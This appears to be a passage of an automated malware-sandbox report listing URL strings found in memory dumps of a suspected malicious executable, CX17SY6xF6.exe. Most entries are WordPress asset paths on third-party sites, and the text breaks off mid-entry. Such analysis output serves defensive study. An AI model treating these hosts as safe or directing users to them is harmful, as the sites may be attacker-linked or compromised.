                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.11
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                  Source: CX17SY6xF6.exe, 00000000.00000003.682623626.0000000000E41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699355741.0000000000E46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.p
                  Source: CX17SY6xF6.exe, 00000000.00000003.577691996.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.649277876.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/0
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/Cc
                  Source: CX17SY6xF6.exe, 00000000.00000003.577691996.0000000000E90000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.577519775.0000000000E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/m
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.717584525.00000000038B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.577510464.0000000000E96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/saenh.dll
                  Source: CX17SY6xF6.exe, 00000000.00000003.576091404.0000000000E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/E
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/e
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com//
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/H#b(
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/v
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
                  Source: CX17SY6xF6.exe, 00000000.00000003.699451551.00000000071CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/l#F(
                  Source: CX17SY6xF6.exe, 00000000.00000003.577604491.0000000000E54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/css/style.min.css?
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/js/search.min.js?v
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=2.3.9
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.9
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 